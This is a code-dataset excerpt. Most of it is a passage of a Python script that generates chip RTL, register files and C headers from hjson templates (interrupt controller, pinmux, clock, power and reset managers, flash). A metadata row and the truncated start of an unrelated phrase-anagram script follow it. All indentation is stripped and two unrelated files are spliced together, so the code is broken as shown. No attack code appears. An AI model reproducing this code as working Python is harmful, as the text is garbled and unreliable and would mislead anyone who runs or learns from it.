hjson_path.mkdir(parents=True, exist_ok=True)
# Generating IP top module script is not generalized yet.
# So, topgen reads template files from rv_plic directory directly.
# Next, if the ip top gen tool is placed in util/ we can import the library.
tpl_path = Path(__file__).resolve().parent / '../hw/ip/rv_plic/data'
hjson_tpl_path = tpl_path / 'rv_plic.hjson.tpl'
rtl_tpl_path = tpl_path / 'rv_plic.sv.tpl'
# Generate Register Package and RTLs
out = StringIO()
with hjson_tpl_path.open(mode='r', encoding='UTF-8') as fin:
hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(src=src, target=target, prio=prio)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("RV_PLIC hjson: %s" % out)
if out == "":
log.error("Cannot generate interrupt controller config file")
return
hjson_gen_path = hjson_path / "rv_plic.hjson"
gencmd = (
"// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson --plic-only "
"-o hw/top_{topname}/\n\n".format(topname=topname))
with hjson_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
# Generate register RTLs (currently using shell execute)
# TODO: More secure way to generate RTL
gen_rtl.gen_rtl(IpBlock.from_text(out, [], str(hjson_gen_path)),
str(rtl_path))
# Generate RV_PLIC Top Module
with rtl_tpl_path.open(mode='r', encoding='UTF-8') as fin:
rtl_tpl = Template(fin.read())
try:
out = rtl_tpl.render(src=src, target=target, prio=prio)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("RV_PLIC RTL: %s" % out)
if out == "":
log.error("Cannot generate interrupt controller RTL")
return
rtl_gen_path = rtl_path / "rv_plic.sv"
with rtl_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
def generate_pinmux(top, out_path):
topname = top['name']
pinmux = top['pinmux']
# Generation without pinmux and pinout configuration is not supported.
assert 'pinmux' in top
assert 'pinout' in top
# Get number of wakeup detectors
if 'num_wkup_detect' in pinmux:
num_wkup_detect = pinmux['num_wkup_detect']
else:
num_wkup_detect = 1
if num_wkup_detect <= 0:
# TODO: add support for no wakeup counter case
log.error('Topgen does currently not support generation of a top ' +
'without DIOs.')
return
if 'wkup_cnt_width' in pinmux:
wkup_cnt_width = pinmux['wkup_cnt_width']
else:
wkup_cnt_width = 8
if wkup_cnt_width <= 1:
log.error('Wakeup counter width must be greater equal 2.')
return
# MIO Pads
n_mio_pads = pinmux['io_counts']['muxed']['pads']
# Total inputs/outputs
# Reuse the counts from the merge phase
n_mio_periph_in = (pinmux['io_counts']['muxed']['inouts'] +
pinmux['io_counts']['muxed']['inputs'])
n_mio_periph_out = (pinmux['io_counts']['muxed']['inouts'] +
pinmux['io_counts']['muxed']['outputs'])
n_dio_periph_in = (pinmux['io_counts']['dedicated']['inouts'] +
pinmux['io_counts']['dedicated']['inputs'])
n_dio_periph_out = (pinmux['io_counts']['dedicated']['inouts'] +
pinmux['io_counts']['dedicated']['outputs'])
n_dio_pads = (pinmux['io_counts']['dedicated']['inouts'] +
pinmux['io_counts']['dedicated']['inputs'] +
pinmux['io_counts']['dedicated']['outputs'])
# TODO: derive this value
attr_dw = 13
# Generation with zero MIO/DIO pads is currently not supported.
assert (n_mio_pads > 0)
assert (n_dio_pads > 0)
log.info('Generating pinmux with following info from hjson:')
log.info('attr_dw: %d' % attr_dw)
log.info('num_wkup_detect: %d' % num_wkup_detect)
log.info('wkup_cnt_width: %d' % wkup_cnt_width)
log.info('n_mio_periph_in: %d' % n_mio_periph_in)
log.info('n_mio_periph_out: %d' % n_mio_periph_out)
log.info('n_dio_periph_in: %d' % n_dio_periph_in)
log.info('n_dio_periph_out: %d' % n_dio_periph_out)
log.info('n_dio_pads: %d' % n_dio_pads)
# Target path
# rtl: pinmux_reg_pkg.sv & pinmux_reg_top.sv
# data: pinmux.hjson
rtl_path = out_path / 'ip/pinmux/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
data_path = out_path / 'ip/pinmux/data/autogen'
data_path.mkdir(parents=True, exist_ok=True)
# Template path
tpl_path = Path(
__file__).resolve().parent / '../hw/ip/pinmux/data/pinmux.hjson.tpl'
# Generate register package and RTLs
gencmd = ("// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson "
"-o hw/top_{topname}/\n\n".format(topname=topname))
hjson_gen_path = data_path / "pinmux.hjson"
out = StringIO()
with tpl_path.open(mode='r', encoding='UTF-8') as fin:
hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(
n_mio_periph_in=n_mio_periph_in,
n_mio_periph_out=n_mio_periph_out,
n_mio_pads=n_mio_pads,
# each DIO has in, out and oe wires
# some of these have to be tied off in the
# top, depending on the type.
n_dio_periph_in=n_dio_pads,
n_dio_periph_out=n_dio_pads,
n_dio_pads=n_dio_pads,
attr_dw=attr_dw,
n_wkup_detect=num_wkup_detect,
wkup_cnt_width=wkup_cnt_width
)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("PINMUX HJSON: %s" % out)
if out == "":
log.error("Cannot generate pinmux HJSON")
return
with hjson_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
gen_rtl.gen_rtl(IpBlock.from_text(out, [], str(hjson_gen_path)),
str(rtl_path))
def generate_clkmgr(top, cfg_path, out_path):
# Target paths
rtl_path = out_path / 'ip/clkmgr/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
data_path = out_path / 'ip/clkmgr/data/autogen'
data_path.mkdir(parents=True, exist_ok=True)
# Template paths
hjson_tpl = cfg_path / '../ip/clkmgr/data/clkmgr.hjson.tpl'
rtl_tpl = cfg_path / '../ip/clkmgr/data/clkmgr.sv.tpl'
pkg_tpl = cfg_path / '../ip/clkmgr/data/clkmgr_pkg.sv.tpl'
hjson_out = data_path / 'clkmgr.hjson'
rtl_out = rtl_path / 'clkmgr.sv'
pkg_out = rtl_path / 'clkmgr_pkg.sv'
tpls = [hjson_tpl, rtl_tpl, pkg_tpl]
outputs = [hjson_out, rtl_out, pkg_out]
names = ['clkmgr.hjson', 'clkmgr.sv', 'clkmgr_pkg.sv']
# clock classification
grps = top['clocks']['groups']
ft_clks = OrderedDict()
rg_clks = OrderedDict()
sw_clks = OrderedDict()
src_aon_attr = OrderedDict()
hint_clks = OrderedDict()
# construct a dictionary of the aon attribute for easier lookup
# ie, src_name_A: True, src_name_B: False
for src in top['clocks']['srcs'] + top['clocks']['derived_srcs']:
if src['aon'] == 'yes':
src_aon_attr[src['name']] = True
else:
src_aon_attr[src['name']] = False
rg_srcs = [src for (src, attr) in src_aon_attr.items() if not attr]
# clocks fed through clkmgr but are not disturbed in any way
# This maintains the clocking structure consistency
# This includes two groups of clocks
# Clocks fed from the always-on source
# Clocks fed to the powerup group
ft_clks = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if src_aon_attr[src] or grp['name'] == 'powerup'])
# root-gate clocks
rg_clks = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if grp['name'] != 'powerup' and
grp['sw_cg'] == 'no' and not src_aon_attr[src]])
# direct sw control clocks
sw_clks = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if grp['sw_cg'] == 'yes' and not src_aon_attr[src]])
# sw hint clocks
hints = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if grp['sw_cg'] == 'hint' and not src_aon_attr[src]])
# hint clocks dict
for clk, src in hints.items():
# the clock is constructed as clk_{src_name}_{module_name}.
# so to get the module name we split from the right and pick the last entry
hint_clks[clk] = OrderedDict()
hint_clks[clk]['name'] = (clk.rsplit('_', 1)[-1])
hint_clks[clk]['src'] = src
for idx, tpl in enumerate(tpls):
out = ""
with tpl.open(mode='r', encoding='UTF-8') as fin:
tpl = Template(fin.read())
try:
out = tpl.render(cfg=top,
div_srcs=top['clocks']['derived_srcs'],
rg_srcs=rg_srcs,
ft_clks=ft_clks,
rg_clks=rg_clks,
sw_clks=sw_clks,
export_clks=top['exported_clks'],
hint_clks=hint_clks)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
if out == "":
log.error("Cannot generate {}".format(names[idx]))
return
with outputs[idx].open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_out), []), str(rtl_path))
# generate pwrmgr
def generate_pwrmgr(top, out_path):
log.info("Generating pwrmgr")
# Count number of wakeups
n_wkups = len(top["wakeups"])
log.info("Found {} wakeup signals".format(n_wkups))
# Count number of reset requests
n_rstreqs = len(top["reset_requests"])
log.info("Found {} reset request signals".format(n_rstreqs))
if n_wkups < 1:
n_wkups = 1
log.warning(
"The design has no wakeup sources. Low power not supported")
# Define target path
rtl_path = out_path / 'ip/pwrmgr/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/pwrmgr/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
# So, read template files from ip directory.
tpl_path = Path(__file__).resolve().parent / '../hw/ip/pwrmgr/data'
hjson_tpl_path = tpl_path / 'pwrmgr.hjson.tpl'
# Render and write out hjson
out = StringIO()
with hjson_tpl_path.open(mode='r', encoding='UTF-8') as fin:
hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(NumWkups=n_wkups,
Wkups=top["wakeups"],
NumRstReqs=n_rstreqs)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("pwrmgr hjson: %s" % out)
if out == "":
log.error("Cannot generate pwrmgr config file")
return
hjson_path = doc_path / "pwrmgr.hjson"
with hjson_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(rtl_path))
# generate rstmgr
def generate_rstmgr(topcfg, out_path):
log.info("Generating rstmgr")
# Define target path
rtl_path = out_path / 'ip/rstmgr/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/rstmgr/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
tpl_path = Path(__file__).resolve().parent / '../hw/ip/rstmgr/data'
# Read template files from ip directory.
tpls = []
outputs = []
names = ['rstmgr.hjson', 'rstmgr.sv', 'rstmgr_pkg.sv']
for x in names:
tpls.append(tpl_path / Path(x + ".tpl"))
if "hjson" in x:
outputs.append(doc_path / Path(x))
else:
outputs.append(rtl_path / Path(x))
# Parameters needed for generation
clks = []
output_rsts = OrderedDict()
sw_rsts = OrderedDict()
leaf_rsts = OrderedDict()
# unique clocks
for rst in topcfg["resets"]["nodes"]:
if rst['type'] != "ext" and rst['clk'] not in clks:
clks.append(rst['clk'])
# resets sent to reset struct
output_rsts = [
rst for rst in topcfg["resets"]["nodes"] if rst['type'] == "top"
]
# sw controlled resets
sw_rsts = [
rst for rst in topcfg["resets"]["nodes"]
if 'sw' in rst and rst['sw'] == 1
]
# leaf resets
leaf_rsts = [rst for rst in topcfg["resets"]["nodes"] if rst['gen']]
log.info("output resets {}".format(output_rsts))
log.info("software resets {}".format(sw_rsts))
log.info("leaf resets {}".format(leaf_rsts))
# Number of reset requests
n_rstreqs = len(topcfg["reset_requests"])
# Generate templated files
for idx, t in enumerate(tpls):
out = StringIO()
with t.open(mode='r', encoding='UTF-8') as fin:
tpl = Template(fin.read())
try:
out = tpl.render(clks=clks,
power_domains=topcfg['power']['domains'],
num_rstreqs=n_rstreqs,
sw_rsts=sw_rsts,
output_rsts=output_rsts,
leaf_rsts=leaf_rsts,
export_rsts=topcfg['exported_rsts'])
except: # noqa: E722
log.error(exceptions.text_error_template().render())
if out == "":
log.error("Cannot generate {}".format(names[idx]))
return
with outputs[idx].open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
hjson_path = outputs[0]
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(rtl_path))
# generate flash
def generate_flash(topcfg, out_path):
log.info("Generating flash")
# Define target path
rtl_path = out_path / 'ip/flash_ctrl/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/flash_ctrl/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
tpl_path = Path(__file__).resolve().parent / '../hw/ip/flash_ctrl/data'
# Read template files from ip directory.
tpls = []
outputs = []
names = ['flash_ctrl.hjson', 'flash_ctrl.sv', 'flash_ctrl_pkg.sv']
for x in names:
tpls.append(tpl_path / Path(x + ".tpl"))
if "hjson" in x:
outputs.append(doc_path / Path(x))
else:
outputs.append(rtl_path / Path(x))
# Parameters needed for generation
flash_mems = [mem for mem in topcfg['memory'] if mem['type'] == 'eflash']
if len(flash_mems) > 1:
log.error("This design does not currently support multiple flashes")
return
cfg = flash_mems[0]
# Generate templated files
for idx, t in enumerate(tpls):
out = StringIO()
with t.open(mode='r', encoding='UTF-8') as fin:
tpl = Template(fin.read())
try:
out = tpl.render(cfg=cfg)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
if out == "":
log.error("Cannot generate {}".format(names[idx]))
return
with outputs[idx].open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
hjson_path = outputs[0]
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(rtl_path))
def generate_top_only(top_only_list, out_path, topname):
log.info("Generating top only modules")
for ip in top_only_list:
hjson_path = Path(__file__).resolve(
).parent / "../hw/top_{}/ip/{}/data/{}.hjson".format(topname, ip, ip)
genrtl_dir = out_path / "ip/{}/rtl".format(ip)
genrtl_dir.mkdir(parents=True, exist_ok=True)
log.info("Generating top modules {}, hjson: {}, output: {}".format(
ip, hjson_path, genrtl_dir))
# Generate reg files
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(genrtl_dir))
def generate_top_ral(top: Dict[str, object],
name_to_block: Dict[str, IpBlock],
dv_base_prefix: str,
out_path: str):
# construct top ral block
regwidth = int(top['datawidth'])
assert regwidth % 8 == 0
addrsep = regwidth // 8
# Generate a map from instance name to the block that it instantiates,
# together with a map of interface addresses.
inst_to_block = {} # type: Dict[str, str]
if_addrs = {} # type: Dict[Tuple[str, Optional[str]], int],
attrs = {} # type: Dict[str, str]
for module in top['module']:
inst_name = module['name']
block_name = module['type']
block = name_to_block[block_name]
if "attr" in module:
if module["attr"] not in ['templated', 'reggen_top', 'reggen_only']:
raise ValueError('Unsupported value for attr field of {}: {!r}'
.format(inst_name, module["attr"]))
attrs[inst_name] = module["attr"]
inst_to_block[inst_name] = block_name
for if_name in block.reg_blocks.keys():
if_addr = int(module["base_addrs"][if_name], 0)
if_addrs[(inst_name, if_name)] = if_addr
# Collect up the memories to add
mems = []
for item in list(top.get("memory", [])):
byte_write = ('byte_write' in item and
item["byte_write"].lower() == "true")
data_intg_passthru = ('data_intg_passthru' in item and
item["data_intg_passthru"].lower() == "true")
size_in_bytes = int(item['size'], 0)
num_regs = size_in_bytes // addrsep
swaccess = access.SWAccess('top-level memory',
item.get('swaccess', 'rw'))
mems.append(window.Window(name=item['name'],
desc='(generated from top-level)',
unusual=False,
byte_write=byte_write,
data_intg_passthru=data_intg_passthru,
validbits=regwidth,
items=num_regs,
size_in_bytes=size_in_bytes,
offset=int(item["base_addr"], 0),
swaccess=swaccess))
chip = Top(regwidth, name_to_block, inst_to_block, if_addrs, mems, attrs)
# generate the top ral model with template
return gen_dv(chip, dv_base_prefix, str(out_path))
def _process_top(topcfg, args, cfg_path, out_path, pass_idx):
# Create generated list
# These modules are generated through topgen
generated_list = [
module['type'] for module in topcfg['module']
if lib.is_templated(module)
]
log.info("Filtered list is {}".format(generated_list))
# These modules are NOT generated but belong to a specific top
# and therefore not part of "hw/ip"
top_only_list = [
module['type'] for module in topcfg['module']
if lib.is_top_reggen(module)
]
log.info("Filtered list is {}".format(top_only_list))
topname = topcfg["name"]
# Sweep the IP directory and gather the config files
ip_dir = Path(__file__).parents[1] / 'hw/ip'
ips = search_ips(ip_dir)
# exclude filtered IPs (to use top_${topname} one) and
exclude_list = generated_list + top_only_list
ips = [x for x in ips if not x.parents[1].name in exclude_list]
# Hack alert
# Generate clkmgr.hjson here so that it can be included below
# Unlike other generated hjsons, clkmgr thankfully does not require
# ip.hjson information. All the information is embedded within
# the top hjson file
amend_clocks(topcfg)
generate_clkmgr(topcfg, cfg_path, out_path)
# It may require two passes to check if the module is needed.
# TODO: first run of topgen will fail due to the absent of rv_plic.
# It needs to run up to amend_interrupt in merge_top function
# then creates rv_plic.hjson then run xbar generation.
hjson_dir = Path(args.topcfg).parent
for ip in generated_list:
# For modules that are generated prior to gathering, we need to take it from
# the output path. For modules not generated before, it may exist in a
# pre-defined area already.
log.info("Appending {}".format(ip))
if ip == 'clkmgr' or (pass_idx > 0):
ip_hjson = Path(out_path) / "ip/{}/data/autogen/{}.hjson".format(
ip, ip)
else:
ip_hjson = hjson_dir.parent / "ip/{}/data/autogen/{}.hjson".format(
ip, ip)
ips.append(ip_hjson)
for ip in top_only_list:
log.info("Appending {}".format(ip))
ip_hjson = hjson_dir.parent / "ip/{}/data/{}.hjson".format(ip, ip)
ips.append(ip_hjson)
# load Hjson and pass validate from reggen
try:
ip_objs = []
for x in ips:
# Skip if it is not in the module list
if x.stem not in [ip["type"] for ip in topcfg["module"]]:
log.info("Skip module %s as it isn't in the top module list" %
x.stem)
continue
# The auto-generated hjson might not yet exist. It will be created
# later, see generate_{ip_name}() calls below. For the initial
# validation, use the template in hw/ip/{ip_name}/data .
if x.stem in generated_list and not x.is_file():
hjson_file = ip_dir / "{}/data/{}.hjson".format(x.stem, x.stem)
log.info(
"Auto-generated hjson %s does not yet exist. " % str(x) +
"Falling back to template %s for initial validation." %
str(hjson_file))
else:
hjson_file = x
ip_objs.append(IpBlock.from_path(str(hjson_file), []))
except ValueError:
raise SystemExit(sys.exc_info()[1])
# Read the crossbars under the top directory
xbar_objs = get_hjsonobj_xbars(hjson_dir)
log.info("Detected crossbars: %s" %
(", ".join([x["name"] for x in xbar_objs])))
# If specified, override the seed for random netlist constant computation.
if args.rnd_cnst_seed:
log.warning('Commandline override of rnd_cnst_seed with {}.'.format(
args.rnd_cnst_seed))
topcfg['rnd_cnst_seed'] = args.rnd_cnst_seed
# Otherwise, we either take it from the top_{topname}.hjson if present, or
# randomly generate a new seed if not.
else:
random.seed()
new_seed = random.getrandbits(64)
if topcfg.setdefault('rnd_cnst_seed', new_seed) == new_seed:
log.warning(
'No rnd_cnst_seed specified, setting to {}.'.format(new_seed))
topcfg, error = validate_top(topcfg, ip_objs, xbar_objs)
if error != 0:
raise SystemExit("Error occured while validating top.hjson")
name_to_block = {} # type: Dict[str, IpBlock]
for block in ip_objs:
lblock = block.name.lower()
assert lblock not in name_to_block
name_to_block[lblock] = block
completecfg = merge_top(topcfg, name_to_block, xbar_objs)
# Generate flash controller and flash memory
generate_flash(topcfg, out_path)
# Generate PLIC
if not args.no_plic and \
not args.alert_handler_only and \
not args.xbar_only:
generate_plic(completecfg, out_path)
if args.plic_only:
sys.exit()
# Generate Alert Handler
if not args.xbar_only:
generate_alert_handler(completecfg, out_path)
if args.alert_handler_only:
sys.exit()
# Generate Pinmux
generate_pinmux(completecfg, out_path)
# Generate Pwrmgr
generate_pwrmgr(completecfg, out_path)
# Generate rstmgr
generate_rstmgr(completecfg, out_path)
# Generate top only modules
# These modules are not templated, but are not in hw/ip
generate_top_only(top_only_list, out_path, topname)
if pass_idx > 0 and args.top_ral:
exit_code = generate_top_ral(completecfg, name_to_block,
args.dv_base_prefix, out_path)
sys.exit(exit_code)
return completecfg, name_to_block
def main():
parser = argparse.ArgumentParser(prog="topgen")
parser.add_argument('--topcfg',
'-t',
required=True,
help="`top_{name}.hjson` file.")
parser.add_argument(
'--outdir',
'-o',
help='''Target TOP directory.
Module is created under rtl/. (default: dir(topcfg)/..)
''') # yapf: disable
parser.add_argument('--verbose', '-v', action='store_true', help="Verbose")
# Generator options: 'no' series. cannot combined with 'only' series
parser.add_argument(
'--no-top',
action='store_true',
help="If defined, topgen doesn't generate top_{name} RTLs.")
parser.add_argument(
'--no-xbar',
action='store_true',
help="If defined, topgen doesn't generate crossbar RTLs.")
parser.add_argument(
'--no-plic',
action='store_true',
help="If defined, topgen doesn't generate the interrup controller RTLs."
)
# Generator options: 'only' series. cannot combined with 'no' series
parser.add_argument(
'--top-only',
action='store_true',
help="If defined, the tool generates top RTL only") # yapf:disable
parser.add_argument(
'--xbar-only',
action='store_true',
help="If defined, the tool generates crossbar RTLs only")
parser.add_argument(
'--plic-only',
action='store_true',
help="If defined, the tool generates RV_PLIC RTL and Hjson only")
parser.add_argument(
'--alert-handler-only',
action='store_true',
help="If defined, the tool generates alert handler hjson only")
# Generator options: generate dv ral model
parser.add_argument(
'--top_ral',
'-r',
default=False,
action='store_true',
help="If set, the tool generates top level RAL model for DV")
parser.add_argument('--dv-base-prefix',
default='dv_base',
help='Prefix for the DV register classes from which '
'the register models are derived.')
# Generator options for compile time random netlist constants
parser.add_argument(
'--rnd_cnst_seed',
type=int,
metavar='<seed>',
help='Custom seed for RNG to compute netlist constants.')
args = parser.parse_args()
# check combinations
if args.top_ral:
args.no_top = True
if (args.no_top or args.no_xbar or
args.no_plic) and (args.top_only or args.xbar_only or
args.plic_only or args.alert_handler_only):
log.error(
"'no' series options cannot be used with 'only' series options")
raise SystemExit(sys.exc_info()[1])
if args.verbose:
log.basicConfig(format="%(levelname)s: %(message)s", level=log.DEBUG)
else:
log.basicConfig(format="%(levelname)s: %(message)s")
if not args.outdir:
outdir = Path(args.topcfg).parent / ".."
log.info("TOP directory not given. Use %s", (outdir))
elif not Path(args.outdir).is_dir():
log.error("'--outdir' should point to writable directory")
raise SystemExit(sys.exc_info()[1])
else:
outdir = Path(args.outdir)
out_path = Path(outdir)
cfg_path = Path(args.topcfg).parents[1]
try:
with open(args.topcfg, 'r') as ftop:
topcfg = hjson.load(ftop,
use_decimal=True,
object_pairs_hook=OrderedDict)
except ValueError:
raise SystemExit(sys.exc_info()[1])
# TODO, long term, the levels of dependency should be automatically determined instead
# of hardcoded. The following are a few examples:
# Example 1: pinmux depends on amending all modules before calculating the correct number of
# pins.
# This would be 1 level of dependency and require 2 passes.
# Example 2: pinmux depends on amending all modules, and pwrmgr depends on pinmux generation to
# know correct number of wakeups. This would be 2 levels of dependency and require 3
# passes.
#
# How does mulit-pass work?
# In example 1, the first pass gathers all modules and merges them. However, the merge process
# uses a stale pinmux. The correct pinmux is then generated using the merged configuration. The
# second pass now merges all the correct modules (including the generated pinmux) and creates
# the final merged config.
#
# In example 2, the first pass gathers all modules and merges them. However, the merge process
# uses a stale pinmux and pwrmgr. The correct pinmux is then generated using the merged
# configuration. However, since pwrmgr is dependent on this new pinmux, it is still generated
# incorrectly. The second pass merge now has an updated pinmux but stale pwrmgr. The correct
# pwrmgr can now be generated. The final pass then merges all the correct modules and creates
# the final configuration.
#
# This fix is related to #2083
process_dependencies = 1
for pass_idx in range(process_dependencies + 1):
log.debug("Generation pass {}".format(pass_idx))
if pass_idx < process_dependencies:
cfg_copy = deepcopy(topcfg)
_process_top(cfg_copy, args, cfg_path, out_path, pass_idx)
else:
completecfg, name_to_block = _process_top(topcfg, args, cfg_path, out_path, pass_idx)
topname = topcfg["name"]
# Generate xbars
if not args.no_xbar or args.xbar_only:
generate_xbars(completecfg, out_path)
# All IPs are generated. Connect phase now
# Find {memory, module} <-> {xbar} connections first.
im.autoconnect(completecfg, name_to_block)
# Generic Inter-module connection
im.elab_intermodule(completecfg)
# Generate top.gen.hjson right before rendering
genhjson_dir = out_path / "data/autogen"
genhjson_dir.mkdir(parents=True, exist_ok=True)
genhjson_path = genhjson_dir / ("top_%s.gen.hjson" % completecfg["name"])
# Header for HJSON
gencmd = '''//
// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson \\
// -o hw/top_{topname}/ \\
// --hjson-only \\
// --rnd_cnst_seed {seed}
'''.format(topname=topname, seed=completecfg['rnd_cnst_seed'])
genhjson_path.write_text(genhdr + gencmd +
hjson.dumps(completecfg, for_json=True))
if not args.no_top or args.top_only:
def render_template(template_path: str, rendered_path: Path, **other_info):
template_contents = generate_top(completecfg, name_to_block,
str(template_path), **other_info)
rendered_path.parent.mkdir(exist_ok=True, parents=True)
with rendered_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(template_contents)
# Header for SV files
gencmd = warnhdr + '''//
// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson \\
// -o hw/top_{topname}/ \\
// --rnd_cnst_seed {seed}
'''.format(topname=topname, seed=topcfg['rnd_cnst_seed'])
# SystemVerilog Top:
# 'toplevel.sv.tpl' -> 'rtl/autogen/top_{topname}.sv'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel.sv.tpl",
out_path / f"rtl/autogen/top_{topname}.sv",
gencmd=gencmd)
# Multiple chip-levels (ASIC, FPGA, Verilator, etc)
for target in topcfg['targets']:
render_template(TOPGEN_TEMPLATE_PATH / "chiplevel.sv.tpl",
out_path / f"rtl/autogen/chip_{topname}_{target['name']}.sv",
gencmd=gencmd,
target=target)
# The C / SV file needs some complex information, so we initialize this
# object to store it.
c_helper = TopGenC(completecfg, name_to_block)
# 'toplevel_pkg.sv.tpl' -> 'rtl/autogen/top_{topname}_pkg.sv'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_pkg.sv.tpl",
out_path / f"rtl/autogen/top_{topname}_pkg.sv",
helper=c_helper,
gencmd=gencmd)
# compile-time random netlist constants
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_rnd_cnst_pkg.sv.tpl",
out_path / f"rtl/autogen/top_{topname}_rnd_cnst_pkg.sv",
gencmd=gencmd)
# C Header + C File + Clang-format file
# Since SW does not use FuseSoC and instead expects those files always
# to be in hw/top_{topname}/sw/autogen, we currently create these files
# twice:
# - Once under out_path/sw/autogen
# - Once under hw/top_{topname}/sw/autogen
for path in [out_path.resolve(),
(SRCTREE_TOP / 'hw/top_{}/'.format(topname)).resolve()]:
# 'clang-format' -> 'sw/autogen/.clang-format'
cformat_tplpath = TOPGEN_TEMPLATE_PATH / 'clang-format'
cformat_dir = path / 'sw/autogen'
cformat_dir.mkdir(parents=True, exist_ok=True)
cformat_path = cformat_dir / '.clang-format'
cformat_path.write_text(cformat_tplpath.read_text())
# 'top_{topname}.h.tpl' -> 'sw/autogen/top_{topname}.h'
cheader_path = cformat_dir / f"top_{topname}.h"
render_template(TOPGEN_TEMPLATE_PATH / "toplevel.h.tpl",
cheader_path,
helper=c_helper)
# Save the relative header path into `c_gen_info`
rel_header_path = cheader_path.relative_to(path.parents[1])
c_helper.header_path = str(rel_header_path)
# 'toplevel.c.tpl' -> 'sw/autogen/top_{topname}.c'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel.c.tpl",
cformat_dir / f"top_{topname}.c",
helper=c_helper)
# 'toplevel_memory.ld.tpl' -> 'sw/autogen/top_{topname}_memory.ld'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_memory.ld.tpl",
cformat_dir / f"top_{topname}_memory.ld")
# 'toplevel_memory.h.tpl' -> 'sw/autogen/top_{topname}_memory.h'
memory_cheader_path = cformat_dir / f"top_{topname}_memory.h"
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_memory.h.tpl",
memory_cheader_path,
helper=c_helper)
try:
cheader_path.relative_to(SRCTREE_TOP)
except ValueError:
log.error("cheader_path %s is not within SRCTREE_TOP %s",
cheader_path, SRCTREE_TOP)
log.error("Thus skipping util/fix_include_guard.py")
continue
# Fix the C header guards, which will have the wrong name
subprocess.run(["util/fix_include_guard.py",
str(cheader_path),
str(memory_cheader_path)],
universal_newlines=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
check=True,
cwd=str(SRCTREE_TOP)) # yapf: disable
# generate chip level xbar and alert_handler TB
tb_files = [
"xbar_env_pkg__params.sv", "tb__xbar_connect.sv",
"tb__alert_handler_connect.sv"
]
for fname in tb_files:
tpl_fname = "%s.tpl" % (fname)
xbar_chip_data_path = TOPGEN_TEMPLATE_PATH / tpl_fname
template_contents = generate_top(completecfg, name_to_block,
str(xbar_chip_data_path))
rendered_dir = out_path / 'dv/autogen'
rendered_dir.mkdir(parents=True, exist_ok=True)
rendered_path = rendered_dir / fname
with rendered_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(template_contents)
# generate parameters for chip-level environment package
tpl_fname = 'chip_env_pkg__params.sv.tpl'
alert_handler_chip_data_path = TOPGEN_TEMPLATE_PATH / tpl_fname
template_contents = generate_top(completecfg, name_to_block,
str(alert_handler_chip_data_path))
rendered_dir = out_path / 'dv/env/autogen'
rendered_dir.mkdir(parents=True, exist_ok=True)
rendered_path = rendered_dir / 'chip_env_pkg__params.sv'
with rendered_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(template_contents)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
831e178ff2a8ab2c7dd55b4d194946bb9836bc8d | b97dac0fdd497e5feadedc0ec89f167294c9ef25 | /Ch03/finding phrase anagrams/phrase_anagrams.py | 2e6c490c2e4f42d7bbdee61bac30d872908d7739 | [] | no_license | djotaku/impracticalpython | 4f6c2cd26ab12cb16eeefb1316a1f91db8666b64 | 5c8c86e80144c88ea6aa97b8326542ea50878f21 | refs/heads/master | 2021-10-08T05:51:07.353428 | 2021-09-30T23:37:04 | 2021-09-30T23:37:04 | 208,647,244 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,859 | py | import sys
from collections import Counter
import load_dictionary
dict_file = load_dictionary.load('words.txt')
# ensure "a" & "I" (both lowercase) are included
dict_file.append('a')
dict_file.append('I')
dict_file = sorted(dict_file) # makes it into list of lists with letters from each words
ini_name = input("enter a name: ")
def find_anagrams(name, word_list):
